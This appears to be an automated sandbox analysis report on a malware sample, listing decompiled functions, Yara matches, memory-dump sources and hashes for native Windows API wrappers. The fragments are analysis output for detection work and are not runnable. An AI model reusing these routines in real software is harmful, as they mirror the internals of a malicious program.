                                                                          • Instruction ID: 17778e0258b6b8ec03ca83b2de6f5c22b460ffc123b1a7241a8a5a553d708e5a
                                                                          • Opcode Fuzzy Hash: 102218f098a73a1511201160fb6dbf6c6944f8721bc7e505da53475859f47592
                                                                          • Instruction Fuzzy Hash: B6E04F76B041186B9B18EAA9DC448AFBAEFDBC4594B11C1799509D7241FB309D0287D0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.691137906.00000000051E0000.00000040.00000001.sdmp, Offset: 051E0000, based on PE: false
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6de5a67edf8a1ea9be58a5606c19b030135c636e3f78611b5744736a3aa39ca6
                                                                          • Instruction ID: cc8d9ec975eca488b8bb2c380a3e3a73b8af15705a5b41081bcb93a02cdeedbd
                                                                          • Opcode Fuzzy Hash: 6de5a67edf8a1ea9be58a5606c19b030135c636e3f78611b5744736a3aa39ca6
                                                                          • Instruction Fuzzy Hash: A7E09271611108EBC710FFB4EA82BAD77B6EB40324F1041A4E404E3344DB395F019B95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.691137906.00000000051E0000.00000040.00000001.sdmp, Offset: 051E0000, based on PE: false
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 26dca0d0a995a21f28f346d240f8906cf1a9856d6dcddb7f9fb4979c59dff594
                                                                          • Instruction ID: 452d6e8b6284cd6434d8edbc9b7d419e9c729dd0e35f34b3988060f26aa16389
                                                                          • Opcode Fuzzy Hash: 26dca0d0a995a21f28f346d240f8906cf1a9856d6dcddb7f9fb4979c59dff594
                                                                          • Instruction Fuzzy Hash: 4DE05E7135422923FA5831A968217EE308F9BD8F11F40842AF5859F7C6CCEAAC0203E9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.691137906.00000000051E0000.00000040.00000001.sdmp, Offset: 051E0000, based on PE: false

                                                                          Non-executed Functions

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.688474836.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false

                                                                          Executed Functions

                                                                          C-Code - Quality: 21%
                                                                          			E00418260(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                          				void* _t18;
                                                                          				void* _t27;
                                                                          				void* _t28;
                                                                          				intOrPtr* _t29;
                                                                          
                                                                          				asm("in al, dx");
                                                                          				_t13 = _a4;
                                                                          				_t29 = _a4 + 0xc48;
                                                                          				E00418DB0(_t27, _t13, _t29,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                                          				_t6 =  &_a32; // 0x413d42
                                                                          				_t12 =  &_a8; // 0x413d42
                                                                          				_t18 =  *((intOrPtr*)( *_t29))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40, _t28); // executed
                                                                          				return _t18;
                                                                          			}








                                                                          APIs
                                                                          • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID: B=A$B=A
                                                                          • API String ID: 2738559852-2767357659
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 21%
                                                                          			E00418262() {
                                                                          				void* _t18;
                                                                          				void* _t27;
                                                                          				void* _t28;
                                                                          				intOrPtr* _t29;
                                                                          				void* _t31;
                                                                          
                                                                          				asm("in al, dx");
                                                                          				_t13 =  *((intOrPtr*)(_t31 + 8));
                                                                          				_t29 =  *((intOrPtr*)(_t31 + 8)) + 0xc48;
                                                                          				E00418DB0(_t27, _t13, _t29,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                                          				_t6 = _t31 + 0x24; // 0x413d42
                                                                          				_t12 = _t31 + 0xc; // 0x413d42
                                                                          				_t18 =  *((intOrPtr*)( *_t29))( *_t12,  *((intOrPtr*)(_t31 + 0x10)),  *((intOrPtr*)(_t31 + 0x14)),  *((intOrPtr*)(_t31 + 0x18)),  *((intOrPtr*)(_t31 + 0x1c)),  *((intOrPtr*)(_t31 + 0x20)),  *_t6,  *((intOrPtr*)(_t31 + 0x28)),  *((intOrPtr*)(_t31 + 0x2c)), _t28); // executed
                                                                          				return _t18;
                                                                          			}









                                                                          APIs
                                                                          • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID: B=A$B=A
                                                                          • API String ID: 2738559852-2767357659
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00409B10(void* __eflags, void* _a4, intOrPtr _a8) {
                                                                          				char* _v8;
                                                                          				struct _EXCEPTION_RECORD _v12;
                                                                          				struct _OBJDIR_INFORMATION _v16;
                                                                          				char _v536;
                                                                          				void* _t15;
                                                                          				struct _OBJDIR_INFORMATION _t17;
                                                                          				struct _OBJDIR_INFORMATION _t18;
                                                                          				void* _t30;
                                                                          				void* _t31;
                                                                          				void* _t32;
                                                                          
                                                                          				_v8 =  &_v536;
                                                                          				_t15 = E0041AB40( &_v12, 0x104, _a8);
                                                                          				_t31 = _t30 + 0xc;
                                                                          				if(_t15 != 0) {
                                                                          					_t17 = E0041AF60(__eflags, _v8);
                                                                          					_t32 = _t31 + 4;
                                                                          					__eflags = _t17;
                                                                          					if(_t17 != 0) {
                                                                          						E0041B1E0( &_v12, 0);
                                                                          						_t32 = _t32 + 8;
                                                                          					}
                                                                          					_t18 = E004192F0(_v8);
                                                                          					_v16 = _t18;
                                                                          					__eflags = _t18;
                                                                          					if(_t18 == 0) {
                                                                          						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                                          						return _v16;
                                                                          					}
                                                                          					return _t18;
                                                                          				} else {
                                                                          					return _t15;
                                                                          				}
                                                                          			}














                                                                          APIs
                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B82
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Load
                                                                          • String ID:
                                                                          • API String ID: 2234796835-0
                                                                          • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                          • Instruction ID: 046ff59bb8e44ad8641c0e43070f5aeaf3db9792b4ffc4f87dfb9ba9f6fb7e9c
                                                                          • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                          • Instruction Fuzzy Hash: D70112B5D4010DB7DF10EAE5DC42FDEB378AB54318F1041A5E908A7281F635EB54C795
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 79%
                                                                          			E004181AC(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                          				long _t21;
                                                                          				void* _t31;
                                                                          
                                                                          				asm("adc eax, 0x553db7cb");
                                                                          				_t15 = _a4;
                                                                          				_t3 = _t15 + 0xc40; // 0xc40
                                                                          				E00418DB0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                          				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                          				return _t21;
                                                                          			}






                                                                          APIs
                                                                          • NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: 8022ee00e791d6ba6cdeb9f4f36d355c2f975163408fedcc37799d91d1f1187c
                                                                          • Instruction ID: 88a94c6d0c33f6d0ee123ca5286cf39aca6a226878f11a5cf3f012dbd39277e5
                                                                          • Opcode Fuzzy Hash: 8022ee00e791d6ba6cdeb9f4f36d355c2f975163408fedcc37799d91d1f1187c
                                                                          • Instruction Fuzzy Hash: 1DF0B2B6200208ABCB48CF88DC95EEB77A9AF8C754F158248FA0D97241D630E8518BA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E004181B0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                          				long _t21;
                                                                          				void* _t31;
                                                                          
                                                                          				_t3 = _a4 + 0xc40; // 0xc40
                                                                          				E00418DB0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                          				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                          				return _t21;
                                                                          			}






                                                                          APIs
                                                                          • NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                          • Instruction ID: 1505d2c2fac7169f29cf6ab97caa2a59105c471fc85729d0552dd22f4c6ed161
                                                                          • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                          • Instruction Fuzzy Hash: D7F0B6B2200208ABCB48CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00418390(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                          				long _t14;
                                                                          				void* _t21;
                                                                          
                                                                          				_t3 = _a4 + 0xc60; // 0xca0
                                                                          				E00418DB0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                          				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                          				return _t14;
                                                                          			}






                                                                          APIs
                                                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateMemoryVirtual
                                                                          • String ID:
                                                                          • API String ID: 2167126740-0
                                                                          • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                          • Instruction ID: c1f36b05bbd4b7963809c3793a6f2df241a2ee7dc34c60eca979b2d1d68cf477
                                                                          • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                          • Instruction Fuzzy Hash: 1DF015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241CA30F810CBE4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E004182E0(intOrPtr _a4, void* _a8) {
                                                                          				long _t8;
                                                                          				void* _t11;
                                                                          
                                                                          				_t5 = _a4;
                                                                          				_t2 = _t5 + 0x10; // 0x300
                                                                          				_t3 = _t5 + 0xc50; // 0x409733
                                                                          				E00418DB0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                                          				_t8 = NtClose(_a8); // executed
                                                                          				return _t8;
                                                                          			}






                                                                          APIs
                                                                          • NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID:
                                                                          • API String ID: 3535843008-0
                                                                          • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                          • Instruction ID: 2c2b34aedc846ab3ae484734a1171ee081eb0df99b6426d3cac892bcac86a451
                                                                          • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                          • Instruction Fuzzy Hash: 7CD012752003146BD710EF99DC45ED7775CEF44750F154459BA185B242C930F90086E4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E004182DA(void* __ebx, intOrPtr _a4, void* _a8) {
                                                                          				long _t9;
                                                                          				void* _t14;
                                                                          
                                                                          				_t6 = _a4;
                                                                          				_t3 = _t6 + 0x10; // 0x300
                                                                          				_t4 = _t6 + 0xc50; // 0x409733
                                                                          				E00418DB0(_t14, _a4, _t4,  *_t3, 0, 0x2c);
                                                                          				_t9 = NtClose(_a8); // executed
                                                                          				return _t9;
                                                                          			}






                                                                          APIs
                                                                          • NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID:
                                                                          • API String ID: 3535843008-0
                                                                          • Opcode ID: 3650b31fe86281201d6f97924ed055f55670177cbf47926ac457e85a907a4de5
                                                                          • Instruction ID: a45fe720f35687527d4960da2fc7e44149292638a9d4a5bd425c4eb29278dd16
                                                                          • Opcode Fuzzy Hash: 3650b31fe86281201d6f97924ed055f55670177cbf47926ac457e85a907a4de5
                                                                          • Instruction Fuzzy Hash: 39D0C2B90092C04FCB11EEB4A5C14C67B40EE912183245A8ED8A40B607C5789205A291
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 41837b7e177afe04ab7f1f7c95e7a59379d69bcb30ece751549f2ac98b54ec4f
                                                                          • Instruction ID: 922af6c13fe4ab4c753314a1122c97f06da693d1fa3a93f63f82a4430d1f0842
                                                                          • Opcode Fuzzy Hash: 41837b7e177afe04ab7f1f7c95e7a59379d69bcb30ece751549f2ac98b54ec4f
                                                                          • Instruction Fuzzy Hash: 2B9002B120100402D14075998805B471009A7D0341F51C111E5054558EC6998DD576B5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: b9a3b9194258664c82366ab4667228774688caab0f3e84e24e9e194fb6cb4de8
                                                                          • Instruction ID: 13da71eb8cc9b960db70e576f2471b67f79c953cd17d3ba2c628307ed3ccaf2d
                                                                          • Opcode Fuzzy Hash: b9a3b9194258664c82366ab4667228774688caab0f3e84e24e9e194fb6cb4de8
                                                                          • Instruction Fuzzy Hash: EA9002A134100442D10075998815F071009E7E1341F51C115E1054558DC659CC527176
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: a3f3cb8fa888bb296391f69e213dc134b428e32774b9f415d4aa3c5e2cc9a0eb
                                                                          • Instruction ID: ce1dda25d2cfa2b72422c01081376bb8d42b4f4ea9d7348231de1486818895db
                                                                          • Opcode Fuzzy Hash: a3f3cb8fa888bb296391f69e213dc134b428e32774b9f415d4aa3c5e2cc9a0eb
                                                                          • Instruction Fuzzy Hash: 2F90027120100413D11175998905B07100DA7D0281F91C512E041455CDD6968952B171
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 4670041b845f933df220b6e4904897295dbe1212e06636c27a13a9c520ab7cc2
                                                                          • Instruction ID: a9ef6aca1d53395e399851f7fbf89000473f142a28b50608c1c5fb67dc884792
                                                                          • Opcode Fuzzy Hash: 4670041b845f933df220b6e4904897295dbe1212e06636c27a13a9c520ab7cc2
                                                                          • Instruction Fuzzy Hash: DF900261242041525545B5998805907500AB7E0281791C112E1404954CC5669856E671
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                                                          • Instruction ID: 5568bf364e599ab98db8d6cec98c55b42aa716c8f34da205b899e6f8c2a7a87e
                                                                          • Opcode Fuzzy Hash: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                                                          • Instruction Fuzzy Hash: EF213CB2C4420857CB20E6649D42BFF73BC9B50304F44057FE989A3181F638BB498BA6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 82%
                                                                          			E00407260(void* __eflags, intOrPtr _a4, long _a8) {
                                                                          				char _v67;
                                                                          				char _v68;
                                                                          				void* _t12;
                                                                          				intOrPtr* _t13;
                                                                          				int _t14;
                                                                          				long _t21;
                                                                          				intOrPtr* _t25;
                                                                          				void* _t26;
                                                                          				void* _t30;
                                                                          
                                                                          				_t30 = __eflags;
                                                                          				_v68 = 0;
                                                                          				E00419D10( &_v67, 0, 0x3f);
                                                                          				E0041A8F0( &_v68, 3);
                                                                          				_t12 = E00409B10(_t30, _a4 + 0x1c,  &_v68); // executed
                                                                          				_t13 = E00413E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                                                          				_t25 = _t13;
                                                                          				if(_t25 != 0) {
                                                                          					_t21 = _a8;
                                                                          					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                                                          					_t32 = _t14;
                                                                          					if(_t14 == 0) {
                                                                          						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409270(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                                          					}
                                                                          					return _t14;
                                                                          				}
                                                                          				return _t13;
                                                                          			}













                                                                          APIs
                                                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID:
                                                                          • API String ID: 1836367815-0
                                                                          • Opcode ID: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
                                                                          • Instruction ID: ed9c0dd32f68776d22a62b6ccf8dda9c2c93357863a303a75fe51d199eec68b3
                                                                          • Opcode Fuzzy Hash: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
                                                                          • Instruction Fuzzy Hash: DE018431A8032876E720A6959C03FFE776C5B40B55F15416EFF04BA1C2E6A87D0646EA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 82%
                                                                          			E004184B3(void* __eax, void* __edi, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                          				char _t13;
                                                                          
                                                                          				asm("stc");
                                                                          				 *((char*)(__edi + 0x2589d498)) = 0x55;
                                                                          				_t10 = _a4;
                                                                          				_t5 = _t10 + 0xc74; // 0xc74
                                                                          				E00418DB0(__edi, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                                          				_t13 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                          				return _t13;
                                                                          			}





                                                                          APIs
                                                                          • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeHeap
                                                                          • String ID:
                                                                          • API String ID: 3298025750-0
                                                                          • Opcode ID: 617b87bc62bef9173d23766c959a8444a372d2d6ca38e192de906baa83162e5b
                                                                          • Instruction ID: 146523db50cbd6da9820d1ab3ab298c9a0a9ba25ab73b9abca6627d3912a3ff7
                                                                          • Opcode Fuzzy Hash: 617b87bc62bef9173d23766c959a8444a372d2d6ca38e192de906baa83162e5b
                                                                          • Instruction Fuzzy Hash: 9FE032B1200604ABDB14DF59CC99EE737A8AF88354F058598FA195B392DA30E9188BB5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 64%
                                                                          			E00418611(void* __edi, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                          				int _t11;
                                                                          
                                                                          				asm("sbb eax, 0x1f5b73b3");
                                                                          				 *((intOrPtr*)(__edi - 0x362c487d)) = es;
                                                                          				asm("repe enter 0x8b55, 0xec");
                                                                          				_t8 = _a4;
                                                                          				E00418DB0(__edi, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t8 + 0xa18)), 0, 0x46);
                                                                          				_t11 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                          				return _t11;
                                                                          			}





                                                                          APIs
                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: LookupPrivilegeValue
                                                                          • String ID:
                                                                          • API String ID: 3899507212-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E004184C0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                          				char _t10;
                                                                          				void* _t15;
                                                                          
                                                                          				_t3 = _a4 + 0xc74; // 0xc74
                                                                          				E00418DB0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                                          				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                          				return _t10;
                                                                          			}






                                                                          APIs
                                                                          • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeHeap
                                                                          • String ID:
                                                                          • API String ID: 3298025750-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00418480(intOrPtr _a4, void* _a8, long _a12, long _a16) {
                                                                          				void* _t10;
                                                                          				void* _t15;
                                                                          
                                                                          				E00418DB0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                                          				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
                                                                          				return _t10;
                                                                          			}






                                                                          APIs
                                                                          • RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1279760036-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00418620(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                          				int _t10;
                                                                          				void* _t15;
                                                                          
                                                                          				E00418DB0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                                          				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                          				return _t10;
                                                                          			}






                                                                          APIs
                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: LookupPrivilegeValue
                                                                          • String ID:
                                                                          • API String ID: 3899507212-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeHeap
                                                                          • String ID:
                                                                          • API String ID: 3298025750-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00418500(intOrPtr _a4, int _a8) {
                                                                          				void* _t10;
                                                                          
                                                                          				_t5 = _a4;
                                                                          				E00418DB0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                                          				ExitProcess(_a8);
                                                                          			}





                                                                          APIs
                                                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ExitProcess
                                                                          • String ID:
                                                                          • API String ID: 621844428-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, Offset: 01610000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Non-executed Functions

                                                                          Strings
                                                                          • The resource is owned shared by %d threads, xrefs: 016EB37E
                                                                          • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 016EB3D6
                                                                          • an invalid address, %p, xrefs: 016EB4CF
                                                                          • <unknown>, xrefs: 016EB27E, 016EB2D1, 016EB350, 016EB399, 016EB417, 016EB48E
                                                                          • The critical section is owned by thread %p., xrefs: 016EB3B9
                                                                          • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 016EB323
                                                                          • The resource is owned exclusively by thread %p, xrefs: 016EB374
                                                                          • The instruction at %p referenced memory at %p., xrefs: 016EB432
